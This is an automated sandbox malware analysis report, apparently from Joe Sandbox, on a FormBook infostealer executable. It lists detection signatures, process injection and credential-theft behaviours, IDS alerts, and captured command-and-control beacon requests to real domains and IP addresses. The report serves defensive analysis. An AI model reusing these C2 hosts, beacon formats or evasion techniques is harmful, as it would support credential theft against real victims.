Windows Analysis Report
A2028041200SD.exe

Overview

General Information

Sample name: A2028041200SD.exe
Analysis ID: 1559171
MD5: 65a28cddb97884a94a7c9faef74300c3
SHA1: 8cdb55cfbf3b463246bfea5ef3b8e3de34c64149
SHA256: 78ccda9ce77fc7adb68fac21cc8019dbdc10fadd481f28f28e0428eb35828fbf
Tags: exe user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for reading data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • A2028041200SD.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\A2028041200SD.exe" MD5: 65A28CDDB97884A94A7C9FAEF74300C3)
    • svchost.exe (PID: 7788 cmdline: "C:\Users\user\Desktop\A2028041200SD.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • zJGHFZpQDL.exe (PID: 6808 cmdline: "C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winrs.exe (PID: 7900 cmdline: "C:\Windows\SysWOW64\winrs.exe" MD5: E6C1CE56E6729A0B077C0F2384726B30)
          • firefox.exe (PID: 5980 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author
0000000A.00000002.3124723950.0000000002B90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000008.00000002.1391788061.0000000003250000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.3124795821.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000008.00000002.1391861547.0000000005400000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000008.00000002.1390489944.00000000024B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(3 further entries not shown)

Source | Rule | Description | Author
8.2.svchost.exe.24b0000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
8.2.svchost.exe.24b0000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\A2028041200SD.exe", CommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", ParentImage: C:\Users\user\Desktop\A2028041200SD.exe, ParentProcessId: 7364, ParentProcessName: A2028041200SD.exe, ProcessCommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", ProcessId: 7788, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\A2028041200SD.exe", CommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", ParentImage: C:\Users\user\Desktop\A2028041200SD.exe, ParentProcessId: 7364, ParentProcessName: A2028041200SD.exe, ProcessCommandLine: "C:\Users\user\Desktop\A2028041200SD.exe", ProcessId: 7788, ProcessName: svchost.exe

AV Detection

Source: A2028041200SD.exe; ReversingLabs: Detection: 31%
Source: Yara match; File source: 8.2.svchost.exe.24b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.svchost.exe.24b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.3124723950.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1391788061.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3124795821.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1391861547.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1390489944.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3121706684.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.3132931690.0000000008020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.3124924415.0000000004A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: A2028041200SD.exe; Joe Sandbox ML: detected
Source: A2028041200SD.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: winrs.pdbGCTL source: svchost.exe, 00000008.00000003.1356648780.0000000002824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356563813.000000000281B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356633765.000000000281A000.00000004.00000020.00020000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000003.1465092401.0000000000EBF000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zJGHFZpQDL.exe, 00000009.00000002.3122329722.0000000000A8E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: A2028041200SD.exe, 00000000.00000003.1283531173.0000000003550000.00000004.00001000.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.1285810002.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1391439293.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1391439293.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1288833673.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1290791645.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1394010925.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1391554853.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: A2028041200SD.exe, 00000000.00000003.1283531173.0000000003550000.00000004.00001000.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.1285810002.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1391439293.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1391439293.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1288833673.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1290791645.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1394010925.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1391554853.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: winrs.pdb source: svchost.exe, 00000008.00000003.1356648780.0000000002824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356563813.000000000281B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356633765.000000000281A000.00000004.00000020.00020000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000003.1465092401.0000000000EBF000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\A2028041200SD.exe; Code function: 0_2_00936CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00936CA9
Source: C:\Users\user\Desktop\A2028041200SD.exe; Code function: 0_2_009360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009360DD
Source: C:\Users\user\Desktop\A2028041200SD.exe; Code function: 0_2_009363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009363F9
Source: C:\Users\user\Desktop\A2028041200SD.exe; Code function: 0_2_0093EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0093EB60
Source: C:\Users\user\Desktop\A2028041200SD.exe; Code function: 0_2_0093F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0093F5FA
Source: C:\Users\user\Desktop\A2028041200SD.exe; Code function: 0_2_0093F56F FindFirstFileW,FindClose,0_2_0093F56F
Source: C:\Users\user\Desktop\A2028041200SD.exe; Code function: 0_2_00941B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00941B2F
Source: C:\Users\user\Desktop\A2028041200SD.exe; Code function: 0_2_00941C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00941C8A
Source: C:\Users\user\Desktop\A2028041200SD.exe; Code function: 0_2_00941F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00941F94
Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe; Code function: 4x nop then pop edi 9_2_08093339
Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe; Code function: 4x nop then xor eax, eax 9_2_08098BB8

Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49847 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49847 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49961 -> 23.167.152.41:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49977 -> 23.167.152.41:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49979 -> 23.167.152.41:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49979 -> 23.167.152.41:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49981 -> 66.29.132.194:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 66.29.132.194:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49987 -> 202.92.5.23:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49983 -> 66.29.132.194:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50006 -> 209.74.77.109:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49994 -> 103.230.159.86:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 202.92.5.23:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49995 -> 103.230.159.86:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50010 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50001 -> 118.107.250.103:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49996 -> 103.230.159.86:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49991 -> 194.195.220.41:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49996 -> 103.230.159.86:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50014 -> 194.245.148.189:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 194.195.220.41:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49978 -> 23.167.152.41:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50015 -> 194.245.148.189:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49985 -> 202.92.5.23:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50017 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50018 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50009 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50003 -> 118.107.250.103:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49997 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49998 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49993 -> 103.230.159.86:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49999 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50013 -> 194.245.148.189:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50008 -> 209.74.77.109:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49989 -> 194.195.220.41:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50008 -> 209.74.77.109:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50000 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50000 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49988 -> 202.92.5.23:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49988 -> 202.92.5.23:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50005 -> 209.74.77.109:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50007 -> 209.74.77.109:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50016 -> 194.245.148.189:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50016 -> 194.245.148.189:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49984 -> 66.29.132.194:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49984 -> 66.29.132.194:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50011 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49992 -> 194.195.220.41:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49992 -> 194.195.220.41:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 118.107.250.103:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50004 -> 118.107.250.103:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50004 -> 118.107.250.103:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50019 -> 199.59.243.227:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50012 -> 188.114.96.3:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50012 -> 188.114.96.3:80
                Source: DNS query: www.beylikduzu616161.xyz
                Source: DNS query: www.dating-apps-az-dn5.xyz
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: NEXINTO-DE NEXINTO-DE
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAU
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\A2028041200SD.exe; Code function: 0_2_00944EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00944EB5
                Source: global traffic; HTTP traffic detected: GET /vluw/?prh4=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G8ybZX+Xf8gbOpuID/3YwCRTfrNHUUA==&_VK8=7pXD8zQxGFxP HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.zkdamdjj.shop | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic; HTTP traffic detected: GET /a4h7/?prh4=PP6GFaOQILwxi5dhMSrYmidfGUiluWiM7xDYUPH7LXca8g8uO5tY4GvA0apkUDdsINAyEZvfq9K0A+PIYqHQIltxcg2u/Ln1i4sz2BSy8/lHA9faVw==&_VK8=7pXD8zQxGFxP HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.75178.club | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic; HTTP traffic detected: GET /k6yn/?_VK8=7pXD8zQxGFxP&prh4=tNpa1p20+8HvGGTGCcJ0ltHXQ7hkDEI9aQgmgnvjgQBap2YCvQVXfu4lL5fLGicbWcSejDEnKeIqzsVAbPYV6QWKx4B669tBZ47n68xm5CBB0u297w== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.orbitoasis.online | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic; HTTP traffic detected: GET /cboa/?prh4=af1TSyH9ZKWDWOLime6W6+N8m41wPvg6MbDiaGUzr5LnkxoPx276h77cE37euV2f02htPG9gF0GAKqxhPgTdbhPG43TCObvDHb/CcXEoGnF55JIhuw==&_VK8=7pXD8zQxGFxP HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.thaor56.online | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic; HTTP traffic detected: GET /0gis/?prh4=aMrcg/vn2G/nVrnfdsqttTKn7l5IpN7CuDhUOTj2ocWrQXkoPHFbln1FmLoTaWY74KRoWkXSZUSbj2dC1qWbZWPyRks4Yv4++AQZW9eiSbZnXCVOCA==&_VK8=7pXD8zQxGFxP HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.earbudsstore.shop | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic; HTTP traffic detected: GET /bwyw/?prh4=zeqgG3zf3rSD22A3/l1gTLGQ/sW8joOuTT/213oW5xKBpEmM0JRqJaaJcKUMxr+7Esc9obOTS2jlvNaYH8wfdJGRHCEAKXdxR5M68AEOT1S+b5dkfA==&_VK8=7pXD8zQxGFxP HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.superiorfencing.net | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global traffic; HTTP traffic detected: GET /2nga/?prh4=Q2EbwnYhq4vEVEYycJMqtdR4BlKtLPQlBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63UJrhBCWi6xUDdTpqdehfcV6DO82Y8sA==&_VK8=7pXD8zQxGFxP HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Host: www.beylikduzu616161.xyz | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
